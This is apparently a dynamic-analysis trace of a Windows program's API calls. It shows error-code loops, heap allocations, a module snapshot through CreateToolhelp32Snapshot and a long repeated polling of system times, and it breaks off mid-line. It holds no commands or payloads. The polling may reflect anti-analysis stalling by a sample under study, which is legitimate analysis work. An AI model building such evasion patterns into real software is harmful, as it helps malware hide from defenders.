GetLastError () returned 0x0 [0077.750] SetLastError (dwErrCode=0x0) [0077.750] GetLastError () returned 0x0 [0077.750] SetLastError (dwErrCode=0x0) [0077.750] GetLastError () returned 0x0 [0077.750] SetLastError (dwErrCode=0x0) [0077.750] GetLastError () returned 0x0 [0077.750] SetLastError (dwErrCode=0x0) [0077.751] GetLastError () returned 0x0 [0077.751] SetLastError (dwErrCode=0x0) [0077.751] GetLastError () returned 0x0 [0077.751] SetLastError (dwErrCode=0x0) [0077.751] GetLastError () returned 0x0 [0077.751] SetLastError (dwErrCode=0x0) [0077.751] GetLastError () returned 0x0 [0077.751] SetLastError (dwErrCode=0x0) [0077.751] GetLastError () returned 0x0 [0077.751] SetLastError (dwErrCode=0x0) [0077.751] GetLastError () returned 0x0 [0077.751] SetLastError (dwErrCode=0x0) [0077.751] GetLastError () returned 0x0 [0077.751] SetLastError (dwErrCode=0x0) [0077.751] GetLastError () returned 0x0 [0077.751] SetLastError (dwErrCode=0x0) [0077.752] GetLastError () returned 0x0 [0077.752] SetLastError (dwErrCode=0x0) [0077.752] GetLastError () returned 0x0 [0077.752] SetLastError (dwErrCode=0x0) [0077.752] GetLastError () returned 0x0 [0077.752] SetLastError (dwErrCode=0x0) [0077.752] GetLastError () returned 0x0 [0077.752] SetLastError (dwErrCode=0x0) [0077.752] GetLastError () returned 0x0 [0077.752] SetLastError (dwErrCode=0x0) [0077.752] GetLastError () returned 0x0 [0077.752] SetLastError (dwErrCode=0x0) [0077.752] GetLastError () returned 0x0 [0077.752] SetLastError (dwErrCode=0x0) [0077.752] GetLastError () returned 0x0 [0077.752] SetLastError (dwErrCode=0x0) [0077.752] GetLastError () returned 0x0 [0077.752] SetLastError (dwErrCode=0x0) [0077.752] GetLastError () returned 0x0 [0077.753] SetLastError (dwErrCode=0x0) [0077.753] GetLastError () returned 0x0 [0077.753] SetLastError (dwErrCode=0x0) [0077.753] GetLastError () returned 0x0 [0077.753] SetLastError (dwErrCode=0x0) [0077.753] GetLastError () returned 0x0 [0077.753] SetLastError (dwErrCode=0x0) [0077.753] GetLastError () returned 0x0 [0077.753] SetLastError (dwErrCode=0x0) [0077.753] GetLastError () returned 0x0 [0077.753] SetLastError (dwErrCode=0x0) [0077.753] GetLastError () returned 0x0 [0077.753] SetLastError (dwErrCode=0x0) [0077.753] GetLastError () returned 0x0 [0077.753] SetLastError (dwErrCode=0x0) [0077.753] GetLastError () returned 0x0 [0077.753] SetLastError (dwErrCode=0x0) [0077.753] GetLastError () returned 0x0 [0077.754] SetLastError (dwErrCode=0x0) [0077.754] GetLastError () returned 0x0 [0077.754] SetLastError (dwErrCode=0x0) [0077.754] GetLastError () returned 0x0 [0077.754] SetLastError (dwErrCode=0x0) [0077.754] GetLastError () returned 0x0 [0077.754] SetLastError (dwErrCode=0x0) [0077.754] GetLastError () returned 0x0 [0077.754] SetLastError (dwErrCode=0x0) [0077.754] GetLastError () returned 0x0 [0077.754] SetLastError (dwErrCode=0x0) [0077.754] GetLastError () returned 0x0 [0077.754] SetLastError (dwErrCode=0x0) [0077.754] GetLastError () returned 0x0 [0077.754] SetLastError (dwErrCode=0x0) [0077.754] GetLastError () returned 0x0 [0077.755] SetLastError (dwErrCode=0x0) [0077.755] GetLastError () returned 0x0 [0077.755] SetLastError (dwErrCode=0x0) [0077.755] GetLastError () returned 0x0 [0077.755] SetLastError (dwErrCode=0x0) [0077.755] GetLastError () returned 0x0 [0077.755] SetLastError (dwErrCode=0x0) [0077.755] GetLastError () returned 0x0 [0077.755] SetLastError (dwErrCode=0x0) [0077.755] GetLastError () returned 0x0 [0077.755] SetLastError (dwErrCode=0x0) [0077.755] GetLastError () returned 0x0 [0077.755] SetLastError (dwErrCode=0x0) [0077.755] GetLastError () returned 0x0 [0077.755] SetLastError (dwErrCode=0x0) [0077.755] GetLastError () returned 0x0 [0077.755] SetLastError (dwErrCode=0x0) [0077.756] GetLastError () returned 0x0 [0077.756] SetLastError (dwErrCode=0x0) [0077.756] GetLastError () returned 0x0 [0077.756] SetLastError (dwErrCode=0x0) [0077.756] GetLastError () returned 0x0 [0077.756] SetLastError (dwErrCode=0x0) [0077.756] GetLastError () returned 0x0 [0077.756] SetLastError (dwErrCode=0x0) [0077.756] GetLastError () returned 0x0 [0077.756] SetLastError (dwErrCode=0x0) [0077.756] GetLastError () returned 0x0 [0077.756] SetLastError (dwErrCode=0x0) [0077.756] GetLastError () returned 0x0 [0077.756] SetLastError (dwErrCode=0x0) [0077.756] GetLastError () returned 0x0 [0077.756] SetLastError (dwErrCode=0x0) [0077.756] GetLastError () returned 0x0 [0077.756] SetLastError (dwErrCode=0x0) [0077.757] GetLastError () returned 0x0 [0077.757] SetLastError (dwErrCode=0x0) [0077.757] GetLastError () returned 0x0 [0077.759] SetLastError (dwErrCode=0x0) [0077.759] GetLastError () returned 0x0 [0077.759] SetLastError (dwErrCode=0x0) [0077.759] GetLastError () returned 0x0 [0077.759] SetLastError (dwErrCode=0x0) [0077.759] GetLastError () returned 0x0 [0077.759] SetLastError (dwErrCode=0x0) [0077.759] GetLastError () returned 0x0 [0077.759] SetLastError (dwErrCode=0x0) [0077.759] GetLastError () returned 0x0 [0077.759] SetLastError (dwErrCode=0x0) [0077.759] GetLastError () returned 0x0 [0077.759] SetLastError (dwErrCode=0x0) [0077.759] GetLastError () returned 0x0 [0077.759] SetLastError (dwErrCode=0x0) [0077.759] GetLastError () returned 0x0 [0077.760] SetLastError (dwErrCode=0x0) [0077.760] GetLastError () returned 0x0 [0077.760] SetLastError (dwErrCode=0x0) [0077.760] GetLastError () returned 0x0 [0077.760] SetLastError (dwErrCode=0x0) [0077.760] GetLastError () returned 0x0 [0077.760] SetLastError (dwErrCode=0x0) [0077.760] GetLastError () returned 0x0 [0077.760] SetLastError (dwErrCode=0x0) [0077.760] GetLastError () returned 0x0 [0077.760] SetLastError (dwErrCode=0x0) [0077.760] GetLastError () returned 0x0 [0077.760] SetLastError (dwErrCode=0x0) [0077.760] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x98) returned 0x261a00 [0077.760] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1f) returned 0x261aa0 [0077.760] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x36) returned 0x261ac8 [0077.760] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x37) returned 0x261b08 [0077.760] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x3c) returned 0x261b48 [0077.760] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x31) returned 0x261b90 [0077.760] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x17) returned 0x261bd0 [0077.760] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x24) returned 0x261bf0 [0077.761] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x14) returned 0x261c20 [0077.761] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xd) returned 0x261c40 [0077.761] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x25) returned 0x261c58 [0077.761] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x39) returned 0x261c88 [0077.761] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x18) returned 0x261cd0 [0077.761] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x17) returned 0x261cf0 [0077.761] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xe) returned 0x261d10 [0077.761] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x69) returned 0x261d28 [0077.761] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x3e) returned 0x261da0 [0077.761] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1b) returned 0x261de8 [0077.761] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1d) returned 0x261e10 [0077.761] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x48) returned 0x261e38 [0077.761] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x12) returned 0x261e88 [0077.761] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x18) returned 0x261ea8 [0077.761] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1b) returned 0x261ec8 [0077.761] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x24) returned 0x261ef0 [0077.761] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x29) returned 0x261f20 [0077.761] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1e) returned 0x261f58 [0077.761] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x41) returned 0x261f80 [0077.761] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x17) returned 0x261fd0 [0077.761] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xf) returned 0x261ff0 [0077.761] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x16) returned 0x262008 [0077.761] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x2a) returned 0x262028 [0077.762] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x29) returned 0x262060 [0077.762] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x15) returned 0x262098 [0077.762] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1e) returned 0x2620b8 [0077.762] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x2a) returned 0x2620e0 [0077.762] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x12) returned 0x262118 [0077.762] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x18) returned 0x262138 [0077.762] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x46) returned 0x262158 [0077.762] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2611f8 | out: hHeap=0x260000) returned 1 [0077.763] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x800) returned 0x2621a8 [0077.763] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x80) returned 0x2611f8 [0077.763] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404e69) returned 0x0 [0077.764] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x2611f8) returned 0x80 [0077.764] GetLastError () returned 0x0 [0077.764] SetLastError (dwErrCode=0x0) [0077.764] GetLastError () returned 0x0 [0077.764] SetLastError (dwErrCode=0x0) [0077.764] GetLastError () returned 0x0 [0077.765] SetLastError (dwErrCode=0x0) [0077.765] GetLastError () returned 0x0 [0077.765] SetLastError (dwErrCode=0x0) [0077.765] GetLastError () returned 0x0 [0077.765] SetLastError (dwErrCode=0x0) [0077.765] GetLastError () returned 0x0 [0077.765] SetLastError (dwErrCode=0x0) [0077.765] GetLastError () returned 0x0 [0077.765] SetLastError (dwErrCode=0x0) [0077.768] GetLastError () returned 0x0 [0077.769] SetLastError (dwErrCode=0x0) [0077.769] GetLastError () returned 0x0 [0077.769] SetLastError (dwErrCode=0x0) [0077.769] GetLastError () returned 0x0 [0077.769] SetLastError (dwErrCode=0x0) [0077.769] GetLastError () returned 0x0 [0077.769] SetLastError (dwErrCode=0x0) [0077.769] GetLastError () returned 0x0 [0077.769] SetLastError (dwErrCode=0x0) [0077.769] GetLastError () returned 0x0 [0077.769] SetLastError (dwErrCode=0x0) [0077.769] GetLastError () returned 0x0 [0077.769] SetLastError (dwErrCode=0x0) [0077.770] GetLastError () returned 0x0 [0077.770] SetLastError (dwErrCode=0x0) [0077.770] GetLastError () returned 0x0 [0077.770] SetLastError (dwErrCode=0x0) [0077.770] GetLastError () returned 0x0 [0077.770] SetLastError (dwErrCode=0x0) [0077.770] GetLastError () returned 0x0 [0077.770] SetLastError (dwErrCode=0x0) [0077.770] GetLastError () returned 0x0 [0077.770] SetLastError (dwErrCode=0x0) [0077.770] GetLastError () returned 0x0 [0077.770] SetLastError (dwErrCode=0x0) [0077.770] GetLastError () returned 0x0 [0077.770] SetLastError (dwErrCode=0x0) [0077.770] GetLastError () returned 0x0 [0077.771] SetLastError (dwErrCode=0x0) [0077.771] GetLastError () returned 0x0 [0077.771] SetLastError (dwErrCode=0x0) [0077.771] GetLastError () returned 0x0 [0077.771] SetLastError (dwErrCode=0x0) [0077.771] GetLastError () returned 0x0 [0077.771] SetLastError (dwErrCode=0x0) [0077.771] GetLastError () returned 0x0 [0077.771] SetLastError (dwErrCode=0x0) [0077.771] GetLastError () returned 0x0 [0077.771] SetLastError (dwErrCode=0x0) [0077.771] GetLastError () returned 0x0 [0077.771] SetLastError (dwErrCode=0x0) [0077.771] GetLastError () returned 0x0 [0077.771] SetLastError (dwErrCode=0x0) [0077.772] GetLastError () returned 0x0 [0077.772] SetLastError (dwErrCode=0x0) [0077.772] GetLastError () returned 0x0 [0077.772] SetLastError (dwErrCode=0x0) [0077.772] GetLastError () returned 0x0 [0077.772] SetLastError (dwErrCode=0x0) [0077.772] GetLastError () returned 0x0 [0077.772] SetLastError (dwErrCode=0x0) [0077.772] GetLastError () returned 0x0 [0077.772] SetLastError (dwErrCode=0x0) [0077.772] GetLastError () returned 0x0 [0077.772] SetLastError (dwErrCode=0x0) [0077.772] GetLastError () returned 0x0 [0077.772] SetLastError (dwErrCode=0x0) [0077.772] GetLastError () returned 0x0 [0077.772] SetLastError (dwErrCode=0x0) [0077.773] GetLastError () returned 0x0 [0077.773] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0077.773] GetProcAddress (hModule=0x76e10000, lpProcName="CreateToolhelp32Snapshot") returned 0x76e4735f [0077.773] GetProcAddress (hModule=0x76e10000, lpProcName="Module32FirstW") returned 0x76e479f9 [0077.773] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x78 [0077.776] Module32FirstW (hSnapshot=0x78, lpme=0x18fac8) returned 0 [0077.776] PeekMessageA (in: lpMsg=0x18fa38, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x18fa38) returned 0 [0077.776] GetTickCount () returned 0x1159ae9 [0077.777] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.777] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.777] GetACP () returned 0x4e4 [0077.777] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.777] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.777] GetACP () returned 0x4e4 [0077.777] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.777] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.777] GetACP () returned 0x4e4 [0077.777] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.777] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.777] GetACP () returned 0x4e4 [0077.777] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.777] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.777] GetACP () returned 0x4e4 [0077.777] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.777] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.778] GetACP () returned 0x4e4 [0077.778] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.778] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.778] GetACP () returned 0x4e4 [0077.778] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.778] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.778] GetACP () returned 0x4e4 [0077.778] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.778] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.778] GetACP () returned 0x4e4 [0077.778] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.778] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.778] GetACP () returned 0x4e4 [0077.778] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.778] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.778] GetACP () returned 0x4e4 [0077.778] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.778] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.778] GetACP () returned 0x4e4 [0077.778] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.779] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.779] GetACP () returned 0x4e4 [0077.779] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.779] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.779] GetACP () returned 0x4e4 [0077.779] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.779] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.779] GetACP () returned 0x4e4 [0077.779] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.779] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.779] GetACP () returned 0x4e4 [0077.779] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.779] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.779] GetACP () returned 0x4e4 [0077.779] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.779] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.779] GetACP () returned 0x4e4 [0077.779] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.779] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.779] GetACP () returned 0x4e4 [0077.779] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.780] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.780] GetACP () returned 0x4e4 [0077.780] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.780] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.780] GetACP () returned 0x4e4 [0077.780] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.780] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.780] GetACP () returned 0x4e4 [0077.780] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.780] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.780] GetACP () returned 0x4e4 [0077.780] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.780] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.780] GetACP () returned 0x4e4 [0077.780] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.780] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.780] GetACP () returned 0x4e4 [0077.780] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.781] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.781] GetACP () returned 0x4e4 [0077.781] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.781] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.781] GetACP () returned 0x4e4 [0077.781] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.781] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.781] GetACP () returned 0x4e4 [0077.781] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.781] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.781] GetACP () returned 0x4e4 [0077.781] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.781] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.781] GetACP () returned 0x4e4 [0077.781] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.781] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.781] GetACP () returned 0x4e4 [0077.781] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.781] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.781] GetACP () returned 0x4e4 [0077.781] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.782] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.782] GetACP () returned 0x4e4 [0077.782] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.782] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.782] GetACP () returned 0x4e4 [0077.782] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.782] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.782] GetACP () returned 0x4e4 [0077.782] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.782] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.782] GetACP () returned 0x4e4 [0077.782] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.782] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.782] GetACP () returned 0x4e4 [0077.782] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.782] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.782] GetACP () returned 0x4e4 [0077.782] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0077.783] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0077.783] GetACP () returned 0x4e4 [0077.783] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, 